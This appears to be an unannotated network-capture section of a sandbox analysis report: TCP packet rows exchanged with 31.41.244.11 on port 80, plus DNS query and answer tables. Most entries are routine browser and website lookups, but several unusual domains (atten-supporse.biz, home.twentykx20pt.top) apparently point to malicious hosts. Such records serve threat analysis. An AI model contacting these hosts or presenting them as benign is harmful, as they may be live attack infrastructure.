Nov 30, 2024 04:06:55.449002028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.449054003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.449985981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.450037003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.450090885 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.450140953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.451067924 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.451117992 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.451180935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.451231003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.452147961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.452194929 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.452260017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.452306986 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.453229904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.453351974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.454313040 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.454428911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.455295086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.455432892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.455549955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.455565929 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.455602884 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.456494093 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.456542015 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.456619024 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.456667900 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.457578897 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.457631111 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.457698107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.457750082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.458666086 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.458719969 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.458751917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.458794117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.459783077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.459825993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.459872961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.459914923 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.460865021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.460903883 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.460947037 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.461026907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.461935997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.461983919 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.462019920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.462070942 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.463016987 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.463061094 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.463129997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.463180065 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.464121103 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.464179993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.464189053 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.464246035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.465186119 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.465239048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.465298891 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.465344906 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.466304064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.466353893 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.466403961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.466451883 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.467408895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.467461109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.467463017 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.467509985 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.468446016 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.468497992 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.468580961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.468640089 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.469574928 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.469624996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.469672918 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.469722033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.470624924 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.470675945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.470716953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.470767021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.471705914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.471755981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.471806049 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.471856117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.472790956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.472839117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.472903013 CET	80	49892	31.41.244.11	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2024 04:06:23.214338064 CET	192.168.2.4	1.1.1.1	0x3c3c	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:44.379554033 CET	192.168.2.4	1.1.1.1	0x95bc	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:44.519083977 CET	192.168.2.4	1.1.1.1	0xbee6	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:06:45.867213964 CET	192.168.2.4	1.1.1.1	0x679	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.005521059 CET	192.168.2.4	1.1.1.1	0x20d2	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.050611973 CET	192.168.2.4	1.1.1.1	0xdcb8	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.144494057 CET	192.168.2.4	1.1.1.1	0x50c8	Standard query (0)	youtube.com	28	IN (0x0001)	false
Nov 30, 2024 04:06:46.316112995 CET	192.168.2.4	1.1.1.1	0x66cd	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.454883099 CET	192.168.2.4	1.1.1.1	0x85c5	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:06:46.647427082 CET	192.168.2.4	1.1.1.1	0xc044	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.658410072 CET	192.168.2.4	1.1.1.1	0x4727	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.754157066 CET	192.168.2.4	1.1.1.1	0x39a2	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.786111116 CET	192.168.2.4	1.1.1.1	0xd87a	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.796899080 CET	192.168.2.4	1.1.1.1	0x9fc6	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.828552008 CET	192.168.2.4	1.1.1.1	0xd5b3	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.834024906 CET	192.168.2.4	1.1.1.1	0x726c	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.925043106 CET	192.168.2.4	1.1.1.1	0x5888	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 30, 2024 04:06:46.934825897 CET	192.168.2.4	1.1.1.1	0xf191	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:06:47.065905094 CET	192.168.2.4	1.1.1.1	0x9de3	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:47.205075026 CET	192.168.2.4	1.1.1.1	0xe549	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:06:47.232817888 CET	192.168.2.4	1.1.1.1	0x9671	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:06:49.309201002 CET	192.168.2.4	1.1.1.1	0xec84	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.309710979 CET	192.168.2.4	1.1.1.1	0xf775	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.494426012 CET	192.168.2.4	1.1.1.1	0x99fb	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.533768892 CET	192.168.2.4	1.1.1.1	0xd853	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.679096937 CET	192.168.2.4	1.1.1.1	0xec51	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.770421982 CET	192.168.2.4	1.1.1.1	0xe2d5	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.821425915 CET	192.168.2.4	1.1.1.1	0x72	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 30, 2024 04:06:49.924369097 CET	192.168.2.4	1.1.1.1	0xe1ad	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.930200100 CET	192.168.2.4	1.1.1.1	0x8c06	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:50.080351114 CET	192.168.2.4	1.1.1.1	0x559b	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 30, 2024 04:06:50.094569921 CET	192.168.2.4	1.1.1.1	0xc428	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:07:03.212388039 CET	192.168.2.4	1.1.1.1	0xc57f	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:03.212440968 CET	192.168.2.4	1.1.1.1	0x9dd	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Nov 30, 2024 04:07:03.401680946 CET	192.168.2.4	1.1.1.1	0x3560	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:03.481718063 CET	192.168.2.4	1.1.1.1	0x39c9	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 30, 2024 04:07:04.151221037 CET	192.168.2.4	1.1.1.1	0x7484	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:04.472439051 CET	192.168.2.4	1.1.1.1	0xffc9	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 30, 2024 04:07:09.889548063 CET	192.168.2.4	1.1.1.1	0x19fa	Standard query (0)	home.twentykx20pt.top	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:09.889585018 CET	192.168.2.4	1.1.1.1	0xc60d	Standard query (0)	home.twentykx20pt.top	28	IN (0x0001)	false
Nov 30, 2024 04:07:13.469376087 CET	192.168.2.4	1.1.1.1	0x86d2	Standard query (0)	home.twentykx20pt.top	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:13.469396114 CET	192.168.2.4	1.1.1.1	0x43f7	Standard query (0)	home.twentykx20pt.top	28	IN (0x0001)	false
Nov 30, 2024 04:07:16.767466068 CET	192.168.2.4	1.1.1.1	0x1bc6	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 30, 2024 04:07:18.703562021 CET	192.168.2.4	1.1.1.1	0x6a59	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.703809977 CET	192.168.2.4	1.1.1.1	0x8abb	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.703969955 CET	192.168.2.4	1.1.1.1	0xeef4	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.863142014 CET	192.168.2.4	1.1.1.1	0xdf20	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.863338947 CET	192.168.2.4	1.1.1.1	0x1cd	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.864458084 CET	192.168.2.4	1.1.1.1	0x683	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.005244970 CET	192.168.2.4	1.1.1.1	0xb049	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Nov 30, 2024 04:07:19.005462885 CET	192.168.2.4	1.1.1.1	0xe6eb	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Nov 30, 2024 04:07:19.006496906 CET	192.168.2.4	1.1.1.1	0x8c2d	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Nov 30, 2024 04:07:19.146328926 CET	192.168.2.4	1.1.1.1	0xdc74	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.146532059 CET	192.168.2.4	1.1.1.1	0x2379	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.297702074 CET	192.168.2.4	1.1.1.1	0xb190	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.348614931 CET	192.168.2.4	1.1.1.1	0xf5ab	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.448803902 CET	192.168.2.4	1.1.1.1	0xf026	Standard query (0)	twitter.com	28	IN (0x0001)	false
Nov 30, 2024 04:07:19.590477943 CET	192.168.2.4	1.1.1.1	0x49b2	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2024 04:06:23.447251081 CET	1.1.1.1	192.168.2.4	0x3c3c	No error (0)	atten-supporse.biz		104.21.16.9	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:23.447251081 CET	1.1.1.1	192.168.2.4	0x3c3c	No error (0)	atten-supporse.biz		172.67.165.166	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:44.377026081 CET	1.1.1.1	192.168.2.4	0x42c2	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:44.518331051 CET	1.1.1.1	192.168.2.4	0x95bc	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.004426956 CET	1.1.1.1	192.168.2.4	0x679	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.142864943 CET	1.1.1.1	192.168.2.4	0x20d2	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.188673019 CET	1.1.1.1	192.168.2.4	0xdcb8	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:46.188673019 CET	1.1.1.1	192.168.2.4	0xdcb8	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.281795979 CET	1.1.1.1	192.168.2.4	0x50c8	No error (0)	youtube.com			28	IN (0x0001)	false
Nov 30, 2024 04:06:46.454220057 CET	1.1.1.1	192.168.2.4	0x66cd	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.592452049 CET	1.1.1.1	192.168.2.4	0x85c5	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Nov 30, 2024 04:06:46.785217047 CET	1.1.1.1	192.168.2.4	0xc044	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.795756102 CET	1.1.1.1	192.168.2.4	0x4727	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:46.795756102 CET	1.1.1.1	192.168.2.4	0x4727	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.827445984 CET	1.1.1.1	192.168.2.4	0xf3dd	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:46.827445984 CET	1.1.1.1	192.168.2.4	0xf3dd	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.891802073 CET	1.1.1.1	192.168.2.4	0x39a2	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:46.891802073 CET	1.1.1.1	192.168.2.4	0x39a2	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:46.891802073 CET	1.1.1.1	192.168.2.4	0x39a2	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.923861027 CET	1.1.1.1	192.168.2.4	0xd87a	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:46.934331894 CET	1.1.1.1	192.168.2.4	0x9fc6	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:47.204399109 CET	1.1.1.1	192.168.2.4	0x9de3	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:47.232316017 CET	1.1.1.1	192.168.2.4	0xd5b3	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:47.252795935 CET	1.1.1.1	192.168.2.4	0x726c	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:47.342730045 CET	1.1.1.1	192.168.2.4	0xe549	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Nov 30, 2024 04:06:49.449448109 CET	1.1.1.1	192.168.2.4	0xec84	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.449563980 CET	1.1.1.1	192.168.2.4	0xf775	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.449563980 CET	1.1.1.1	192.168.2.4	0xf775	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.631895065 CET	1.1.1.1	192.168.2.4	0x99fb	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:49.631895065 CET	1.1.1.1	192.168.2.4	0x99fb	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.677495956 CET	1.1.1.1	192.168.2.4	0xd853	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.817074060 CET	1.1.1.1	192.168.2.4	0xec51	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.894642115 CET	1.1.1.1	192.168.2.4	0x1727	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:49.894642115 CET	1.1.1.1	192.168.2.4	0x1727	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.908775091 CET	1.1.1.1	192.168.2.4	0xf466	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:49.910409927 CET	1.1.1.1	192.168.2.4	0xe2d5	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:06:49.910409927 CET	1.1.1.1	192.168.2.4	0xe2d5	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:50.061829090 CET	1.1.1.1	192.168.2.4	0xe1ad	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:06:50.067426920 CET	1.1.1.1	192.168.2.4	0x8c06	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:03.512970924 CET	1.1.1.1	192.168.2.4	0xc57f	No error (0)	httpbin.org		18.208.8.205	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:03.512970924 CET	1.1.1.1	192.168.2.4	0xc57f	No error (0)	httpbin.org		18.213.123.165	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:03.582065105 CET	1.1.1.1	192.168.2.4	0x6c97	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:04.149894953 CET	1.1.1.1	192.168.2.4	0x3560	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:07:04.149894953 CET	1.1.1.1	192.168.2.4	0x3560	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:07:04.149894953 CET	1.1.1.1	192.168.2.4	0x3560	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:04.471462965 CET	1.1.1.1	192.168.2.4	0x7484	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:10.696458101 CET	1.1.1.1	192.168.2.4	0x19fa	No error (0)	home.twentykx20pt.top		34.118.84.150	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:13.607338905 CET	1.1.1.1	192.168.2.4	0x86d2	No error (0)	home.twentykx20pt.top		34.118.84.150	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.840781927 CET	1.1.1.1	192.168.2.4	0x6a59	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:07:18.840781927 CET	1.1.1.1	192.168.2.4	0x6a59	No error (0)	star-mini.c10r.facebook.com		157.240.195.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841064930 CET	1.1.1.1	192.168.2.4	0xeef4	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841294050 CET	1.1.1.1	192.168.2.4	0x8abb	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:07:18.841294050 CET	1.1.1.1	192.168.2.4	0x8abb	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.21.46	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
